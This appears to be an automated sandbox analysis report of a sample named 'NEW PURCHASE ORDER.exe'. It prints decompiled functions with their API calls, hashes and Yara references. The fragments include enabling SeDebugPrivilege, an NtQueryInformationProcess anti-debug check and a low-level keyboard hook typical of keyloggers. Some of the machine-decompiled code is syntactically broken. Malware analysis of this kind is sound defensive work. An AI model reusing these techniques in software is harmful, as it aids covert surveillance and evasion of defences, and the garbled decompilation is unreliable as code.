0x004051ad

APIs

GetDlgItem.USER32 ref: 00405188
ShowWindow.USER32(00000000,|O@,?,00404F7C,00000000), ref: 0040519A

Strings

|O@, xrefs: 0040518E, 004051A0, 00405198

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID: |O@
API String ID: 3351165006-2744605308
Opcode ID: 602405ea5da41d1cee220ddccc4658af6c30278ff86afce3083b507398f518ee
Instruction ID: a268a22fd2beb119c92ef0416800b48a1b86755893f744a3cd009c14255cb5d3
Opcode Fuzzy Hash: 602405ea5da41d1cee220ddccc4658af6c30278ff86afce3083b507398f518ee
Instruction Fuzzy Hash: C1D05B3654C2047FDB0C1BA0ED0BE593B38DB04714F02013DF60A690D1DD7674905E5C

Uniqueness

Uniqueness Score: -1.00%

Function 004037BE, Relevance: 5.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004037BE(void** _a4, signed int* _a8, intOrPtr _a12, signed int _a16) {
				signed int _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				unsigned int _t23;
				signed int* _t26;
				signed int _t27;
				void* _t28;
				unsigned int _t32;
				signed int _t34;
				intOrPtr _t35;
				void** _t36;

				_t26 = _a8;
				_t35 = _a12;
				_t27 =  *_t26;
				if(_t35 > _t27) {
					_t32 = (_t11 | 0xffffffff) / _a16;
					if(_t35 > _t32) {
						L13:
						_t14 = 0;
						L14:
						return _t14;
					}
					_t15 = 4;
					_t28 =  <  ? _t15 : _t27;
					if(_t28 >= _t35) {
						L8:
						_t36 = _a4;
						_t34 =  >=  ? _t28 : _t32;
						_push(_t34 * _a16);
						if( *_t36 == 0) {
							_t19 = HeapAlloc(GetProcessHeap(), 0, ??);
						} else {
							_t19 = HeapReAlloc(GetProcessHeap(), 0,  *_t36, ??);
						}
						if(_t19 == 0) {
							goto L13;
						} else {
							 *_t36 = _t19;
							 *_t26 = _t34;
							_t14 = 1;
							goto L14;
						}
					}
					_t23 = _t32 >> 1;
					while(_t28 <= _t23) {
						_t28 = _t28 + _t28;
						if(_t28 < _t35) {
							continue;
						}
						break;
					}
					goto L8;
				}
				return 1;
			}

0x004037c2
0x004037c6
0x004037c9
0x004037cd
0x004037dd
0x004037e1
0x00403840
0x00403840
0x00403842
0x00000000
0x00403842
0x004037e5
0x004037e8
0x004037ed
0x004037ff
0x004037ff
0x00403802
0x0040380e
0x0040380f
0x0040382d
0x00403811
0x0040381c
0x0040381c
0x00403835
0x00000000
0x00403837
0x00403837
0x0040383b
0x0040383d
0x00000000
0x0040383d
0x00403835
0x004037f1
0x004037f3
0x004037f7
0x004037fb
0x00000000
0x00000000
0x00000000
0x004037fb
0x00000000
0x004037fd
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00000000,?,00403714,?,?,?,00000008), ref: 00403815
HeapReAlloc.KERNEL32(00000000,?,00000000,?,00403714,?,?,?,00000008), ref: 0040381C

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8362332c85c4669838b150a5b1a53e02f1ecad3d22cb47dbdbe853a08e9c9fee
Instruction ID: 576642d43e4426ce8f968db8fb624676dc4aa8b464821f1d6d7b0ed8d77f5ad2
Opcode Fuzzy Hash: 8362332c85c4669838b150a5b1a53e02f1ecad3d22cb47dbdbe853a08e9c9fee
Instruction Fuzzy Hash: 931125B23041109FDF14AE789C4472EBBEDBF48762F25483AF107E72C0D6709950866C

Uniqueness

Uniqueness Score: -1.00%

Function 004036F9, Relevance: 5.1, APIs: 4, Instructions: 51
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036F9(void* __eflags, intOrPtr* _a4, WCHAR* _a8, signed int _a12, intOrPtr* _a16) {
				void* _t27;
				signed int _t28;
				intOrPtr _t36;
				signed short _t38;
				intOrPtr* _t44;
				signed int _t46;

				_t44 = _a4;
				_t38 = 0;
				_t27 = E004037BE(_t44, _t44 + 8,  *(_t44 + 4) + 1, 8);
				if(_t27 != 0) {
					if((_a12 & 0x00000001) != 0) {
						_t38 =  *_a16 -  *((intOrPtr*)(_a16 + 0xc));
					}
					_t46 =  *(_t44 + 4);
					_t28 = lstrlenW(_a8);
					 *( *_t44 + _t46 * 8) = HeapAlloc(GetProcessHeap(), 0, 2 + _t28 * 2);
					lstrcpyW( *( *_t44 + _t46 * 8), _a8);
					_t36 =  *_t44;
					 *(_t36 + 4 + _t46 * 8) = (_t38 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff;
					 *(_t44 + 4) =  *(_t44 + 4) + 1;
					return _t36;
				}
				return _t27;
			}

0x004036fe
0x00403701
0x0040370f
0x00403719
0x0040371f
0x00403726
0x00403726
0x0040372d
0x00403730
0x00403752
0x0040375a
0x0040376e
0x00403770
0x00403774
0x00000000
0x00403777
0x0040377b

APIs

lstrlenW.KERNEL32(?), ref: 00403730
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403740
HeapAlloc.KERNEL32(00000000), ref: 00403747
lstrcpyW.KERNEL32 ref: 0040375A

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcesslstrcpylstrlen
String ID:
API String ID: 2988581199-0
Opcode ID: 1d492c81ffbf71f5924fe4df67145a4c21ec4dd55c89ebe29f59a3be03a313c7
Instruction ID: b01cf941638b57e3feab31bb3dc66ddf3a443e60655c02778df69756432ae06d
Opcode Fuzzy Hash: 1d492c81ffbf71f5924fe4df67145a4c21ec4dd55c89ebe29f59a3be03a313c7
Instruction Fuzzy Hash: FA1161B5100205AFD700CF69D988E6ABBBCFF48355F01816AFD1AD7261D731E920CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NEW PURCHASE ORDER.exe PID: 5940 Parent PID: 5772 NEW PURCHASE ORDER.exeCOMMON

Executed Functions

Function 004BA019, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004BA019(void* __ebx, void* __edi, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t178 = __esi;
				_t171 = __edi;
				_t65 = E004B99E4();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E004B9A42( &_v8) != 0 || E004B99EA( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004A5EA4();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E004B99E4();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E004B9A42( &_v52);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E004A5EA4();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x4eb018; // 0xa3bb88a6
						_v100 = _t74 ^ _t192;
						 *0x4eb464 =  *0x4eb464 | 0xffffffff;
						 *0x4eb458 =  *0x4eb458 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t139 = "TZ";
						_t172 = 0;
						 *0x4eea10 = 0;
						_t78 = E004AC555(__eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E004B3009(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E004AC555(__eflags,  &_v280, _t184, _v276, _t139);
									__eflags = _t85;
									if(_t85 == 0) {
										E004B2FCF(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E004B2FCF();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L80:
							L47(); // executed
						} else {
							__eflags =  *_t172;
							if( *_t172 == 0) {
								goto L80;
							} else {
								_push(_t172);
								E004BA019(_t139, _t172, _t183);
							}
						}
						E004B2FCF(_t183);
						__eflags = _v16 ^ _t192;
						return E0049CE1D(_v16 ^ _t192);
					} else {
						_t89 = E004B99EA( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E004B9A16( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E004B2FCF( *0x4eea08);
								 *0x4eea08 = 0;
								 *_t194 = 0x4eea18; // executed
								_t93 = GetTimeZoneInformation(??); // executed
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x4eea18 * 0x3c;
									_t167 =  *0x4eea6c; // 0x0
									_push(_t171);
									 *0x4eea10 = 1;
									_v12 = _t150;
									__eflags =  *0x4eea5e; // 0xb
									if(__eflags != 0) {
										_t151 = _t150 + _t167 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x4eeab2; // 0x3
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x4eeac0; // 0xffffffc4
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t167) * 0x3c;
										}
									}
									_t176 = E004AE4AF();
									_t99 = WideCharToMultiByte(_t176, 0, "Pacific Standard Time", 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, "Pacific Daylight Time", 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E004B99DE()) = _v12;
								 *((intOrPtr*)(E004B99D2())) = _v16;
								_t96 = E004B99D8();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x4eea08; // 0x0
					_t178 = _a4;
					if(_t168 == 0) {
						L12:
						E004B2FCF(_t168);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x4ba40a
						_t169 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t169 + 1; // 0x4ba40b
						 *0x4eea08 = E004B3009(_t154 - _t169, _t13);
						_t116 = E004B2FCF(0);
						_t170 =  *0x4eea08; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x4ba40a
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x4ba40b
							_t119 = E004AD3A2(_t170, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E004C18F1(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E004AC2E8(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E004AC2E8(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E004AC2E8(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E004B99DE()) = _v8;
										_t128 = E004B99D2();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E004C18F1(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x004ba019
0x004ba019
0x004ba023
0x004ba028
0x004ba02c
0x004ba02e
0x004ba036
0x004ba041
0x004ba1e1
0x004ba1e3
0x004ba1e4
0x004ba1e5
0x004ba1e6
0x004ba1e7
0x004ba1e8
0x004ba1ed
0x004ba1f1
0x004ba1f3
0x004ba1f6
0x004ba1fd
0x004ba204
0x004ba208
0x004ba20b
0x004ba20e
0x004ba213
0x004ba214
0x004ba216
0x004ba33e
0x004ba33e
0x004ba33f
0x004ba340
0x004ba341
0x004ba342
0x004ba343
0x004ba348
0x004ba34b
0x004ba34c
0x004ba354
0x004ba35b
0x004ba35e
0x004ba36b
0x004ba372
0x004ba373
0x004ba374
0x004ba375
0x004ba37a
0x004ba389
0x004ba390
0x004ba398
0x004ba39a
0x004ba3a4
0x004ba3a7
0x004ba3b4
0x004ba3b7
0x004ba3b9
0x004ba3d2
0x004ba3da
0x004ba3dc
0x004ba3e2
0x004ba3e7
0x004ba3de
0x004ba3de
0x00000000
0x004ba3de
0x004ba3bb
0x004ba3bb
0x004ba3bc
0x004ba3bc
0x004ba3bc
0x004ba3e9
0x004ba39c
0x004ba39c
0x004ba39c
0x004ba3f6
0x004ba3f8
0x004ba3fa
0x004ba3fc
0x004ba40c
0x004ba40c
0x004ba3fe
0x004ba3fe
0x004ba401
0x00000000
0x004ba403
0x004ba403
0x004ba404
0x004ba409
0x004ba401
0x004ba412
0x004ba41d
0x004ba428
0x004ba21c
0x004ba220
0x004ba225
0x004ba226
0x004ba228
0x00000000
0x004ba22e
0x004ba232
0x004ba237
0x004ba238
0x004ba23a
0x00000000
0x004ba240
0x004ba246
0x004ba24b
0x004ba251
0x004ba258
0x004ba25e
0x004ba261
0x004ba267
0x004ba26e
0x004ba274
0x004ba278
0x004ba27e
0x004ba281
0x004ba288
0x004ba28d
0x004ba28d
0x004ba28f
0x004ba28f
0x004ba292
0x004ba299
0x004ba2b1
0x004ba2b1
0x004ba2b4
0x004ba29b
0x004ba29b
0x004ba2a0
0x004ba2a2
0x00000000
0x004ba2a4
0x004ba2a6
0x004ba2ac
0x004ba2ac
0x004ba2a2
0x004ba2bc
0x004ba2d0
0x004ba2d6
0x004ba2d8
0x004ba2e6
0x004ba2e8
0x004ba2da
0x004ba2da
0x004ba2dd
0x00000000
0x004ba2df
0x004ba2e1
0x004ba2e1
0x004ba2dd
0x004ba2fd
0x004ba304
0x004ba306
0x004ba315
0x004ba318
0x004ba308
0x004ba308
0x004ba30b
0x00000000
0x004ba30d
0x004ba310
0x004ba310
0x004ba30b
0x004ba306
0x004ba322
0x004ba32c
0x004ba331
0x004ba336
0x004ba33d
0x004ba33d
0x004ba23a
0x004ba228
0x004ba059
0x004ba059
0x004ba05f
0x004ba064
0x004ba09a
0x004ba09b
0x004ba0a1
0x004ba0a3
0x004ba0a3
0x004ba0a6
0x004ba0a6
0x004ba0a8
0x004ba0a9
0x004ba0af
0x004ba0ba
0x004ba0bf
0x004ba0c4
0x004ba0ce
0x00000000
0x004ba0d4
0x004ba0d4
0x004ba0d6
0x004ba0d7
0x004ba0d7
0x004ba0da
0x004ba0da
0x004ba0dc
0x004ba0dd
0x004ba0e4
0x004ba0e9
0x004ba0ee
0x004ba0f3
0x004ba0fb
0x004ba0fc
0x004ba102
0x004ba107
0x004ba10c
0x004ba112
0x004ba117
0x004ba118
0x004ba11b
0x00000000
0x00000000
0x00000000
0x004ba11b
0x004ba120
0x004ba121
0x004ba126
0x004ba128
0x004ba128
0x004ba130
0x004ba136
0x004ba139
0x004ba139
0x004ba13d
0x00000000
0x00000000
0x004ba147
0x004ba147
0x004ba14a
0x004ba14d
0x004ba14f
0x004ba15d
0x004ba15f
0x004ba169
0x004ba169
0x004ba16b
0x004ba16d
0x00000000
0x00000000
0x004ba164
0x004ba166
0x004ba168
0x004ba168
0x00000000
0x004ba168
0x00000000
0x004ba166
0x004ba16f
0x004ba172
0x004ba174
0x004ba17f
0x004ba181
0x004ba18b
0x004ba18b
0x004ba18d
0x004ba18f
0x00000000
0x00000000
0x004ba186
0x004ba188
0x004ba18a
0x004ba18a
0x00000000
0x004ba18a
0x00000000
0x004ba188
0x004ba18b
0x004ba172
0x004ba191
0x004ba191
0x004ba193
0x004ba197
0x004ba197
0x004ba19c
0x004ba19e
0x004ba1a1
0x004ba1a4
0x004ba1a6
0x004ba1a9
0x004ba1c1
0x004ba1c4
0x004ba1c7
0x004ba1cf
0x004ba1d4
0x004ba1d9
0x00000000
0x004ba1d9
0x004ba1ab
0x004ba1b0
0x004ba1b3
0x004ba1b8
0x004ba1bb
0x004ba1bd
0x00000000
0x00000000
0x004ba1bf
0x004ba10c
0x00000000
0x004ba0f3
0x004ba066
0x004ba066
0x004ba068
0x004ba06a
0x004ba06a
0x004ba06e
0x00000000
0x00000000
0x004ba072
0x004ba086
0x004ba086
0x004ba074
0x004ba074
0x004ba074
0x004ba07a
0x00000000
0x004ba07c
0x004ba07c
0x004ba07f
0x004ba084
0x00000000
0x00000000
0x00000000
0x00000000
0x004ba084
0x004ba07a
0x004ba08f
0x004ba091
0x004ba1e0
0x004ba1e0
0x004ba097
0x004ba097
0x00000000
0x004ba097
0x00000000
0x004ba091
0x004ba08a
0x004ba08c
0x004ba08c
0x00000000
0x004ba08c
0x004ba064
0x00000000

APIs

_free.LIBCMT ref: 004BA09B
_free.LIBCMT ref: 004BA0BF
_free.LIBCMT ref: 004BA246
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004078B0), ref: 004BA258
WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 004BA2D0
WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 004BA2FD
_free.LIBCMT ref: 004BA412

Strings

Pacific Daylight Time, xrefs: 004BA2F6
Pacific Standard Time, xrefs: 004BA2C9

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 314583886-1154798116
Opcode ID: c2bbfe1951e993ec81f277e3179625c8652b62e7d3a059a82c11f95731624302
Instruction ID: c7439f9608b8c8f052815cb7c37f01633d4ad8815d3d8a48d05f79c4e51f4a0d
Opcode Fuzzy Hash: c2bbfe1951e993ec81f277e3179625c8652b62e7d3a059a82c11f95731624302
Instruction Fuzzy Hash: EDC12871904244ABDB249F7E8C81AEB7BB8EF41314F1445AFE4809B352E7388E51C77A

Uniqueness

Uniqueness Score: -1.00%

Function 00447818, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00447818(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v24;
				signed int _v28;
				intOrPtr _v32;
				struct _TOKEN_PRIVILEGES _v40;
				struct _LUID _v48;
				long _v52;
				void* _v56;
				signed int _t28;
				int _t34;
				void* _t57;
				long _t60;
				signed int _t63;

				_t65 = (_t63 & 0xfffffff8) - 0x34;
				_t28 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t28 ^ (_t63 & 0xfffffff8) - 0x00000034;
				_t60 = 0x10;
				_v52 = _t60;
				_t57 = __edx;
				if(OpenProcessToken(GetCurrentProcess(), 0x22,  &_v56) != 0) {
					_t34 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v48); // executed
					if(_t34 == 0) {
						L2:
						L3:
						return E0049CE1D(_v8 ^ _t65);
					}
					_v24.Privileges = _v48.LowPart;
					_v16 = _v48.HighPart;
					_v24.PrivilegeCount = 1;
					_v12 = 0;
					AdjustTokenPrivileges(_v56, 0,  &_v24, _t60,  &_v40,  &_v52); // executed
					_v40.Privileges = _v48.LowPart;
					_v40.PrivilegeCount = 1;
					_v32 = _v48.HighPart;
					if(_t57 == 0) {
						_v28 = _v28 & 0xfffffffd;
					} else {
						_v28 = _v28 | 0x00000002;
					}
					AdjustTokenPrivileges(_v56, 0,  &_v40, _v52, 0, 0); // executed
					if(GetLastError() != 0) {
						goto L2;
					}
					goto L3;
				}
				GetLastError();
				goto L2;
			}

0x0044781e
0x00447821
0x00447828
0x00447831
0x00447836
0x0044783d
0x0044784e
0x00447877
0x0044787f
0x00447856
0x00447858
0x00447869
0x00447869
0x00447885
0x0044788d
0x0044789a
0x004478b4
0x004478b8
0x004478be
0x004478c6
0x004478ce
0x004478d4
0x004478dd
0x004478d6
0x004478d6
0x004478d6
0x004478f2
0x004478fc
0x00000000
0x00000000
0x00000000
0x00447902
0x00447850
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000022,?), ref: 0044783F
OpenProcessToken.ADVAPI32(00000000), ref: 00447846
GetLastError.KERNEL32 ref: 00447850
LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00447877
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,?), ref: 004478B8
AdjustTokenPrivileges.KERNELBASE(?,00000000,000000FD,?,00000000,00000000), ref: 004478F2
GetLastError.KERNEL32 ref: 004478F4

Strings

SeDebugPrivilege, xrefs: 00447871

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Token$AdjustErrorLastPrivilegesProcess$CurrentLookupOpenPrivilegeValue
String ID: SeDebugPrivilege
API String ID: 2773402033-2896544425
Opcode ID: 85fb92490f0f8a15989a6b66606816f3162ba23b3d7adfa96b60684d9a0e7cd6
Instruction ID: 90dea48e7e83108975329189df0cb34afaa59d95de0f56ed7103f25d54040895
Opcode Fuzzy Hash: 85fb92490f0f8a15989a6b66606816f3162ba23b3d7adfa96b60684d9a0e7cd6
Instruction Fuzzy Hash: 3A214FB1518345AFD310DF24DC84E6BBBE8FB88754F000A2EF895C6251E774D905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004382E8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004382E8(void* __esi) {
				signed int _v8;
				void* _v12;
				void _v32;
				long _v36;
				signed int _t9;
				signed int _t23;

				_t9 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t9 ^ _t23;
				_v36 = _v36 & 0x00000000;
				if(GetProcAddress(LoadLibraryA("NTDLL.DLL"), "NtQueryInformationProcess") != 0) {
					_t12 = NtQueryInformationProcess(GetCurrentProcess(), 0,  &_v32, 0x18,  &_v36); // executed
					if(_t12 < 0 || _v36 != 0x18) {
						goto L4;
					} else {
					}
				}
				return E0049CE1D(_v8 ^ _t23);
			}

0x004382ee
0x004382f5
0x004382f8
0x00438318
0x0043832d
0x00438331
0x00000000
0x00438339
0x00438339
0x00438331
0x0043834d

APIs

LoadLibraryA.KERNEL32(NTDLL.DLL,NtQueryInformationProcess), ref: 00438307
GetProcAddress.KERNEL32(00000000), ref: 0043830E
GetCurrentProcess.KERNEL32(00000000,?,00000018,00000000), ref: 00438326
NtQueryInformationProcess.NTDLL(00000000), ref: 0043832D

Strings

NtQueryInformationProcess, xrefs: 004382FD
NTDLL.DLL, xrefs: 00438302

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 3653371871-2613899276
Opcode ID: dfd8b8bb9dec71ef832ee325f34343ce159435f71b5cfb3d5a7ae222f34f9b7a
Instruction ID: 4c2aab8579277b2b8d6d1ee676096609c7c8e0f886d3ae4e14bd530946186aab
Opcode Fuzzy Hash: dfd8b8bb9dec71ef832ee325f34343ce159435f71b5cfb3d5a7ae222f34f9b7a
Instruction Fuzzy Hash: 65F04431901318ABDF109BE59C45FEEB7B8AB08751F50016AF901E6290CF78995487A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043656A, Relevance: 4.5, APIs: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000), ref: 00436592
SetWindowsHookExW.USER32(0000000D,0043527C,00000000), ref: 004365A0
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004365C8

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: HandleHookMessageModuleWindows
String ID:
API String ID: 3484243101-0
Opcode ID: 5359bc77c6744d1b119d74be3b21fe046dd9245d5038d394d8a3aefeb46aa32a
Instruction ID: b0d32cd98488177756b2ce22fbb7a86962624bb5ed66f4eacbafa718af698bc2
Opcode Fuzzy Hash: 5359bc77c6744d1b119d74be3b21fe046dd9245d5038d394d8a3aefeb46aa32a
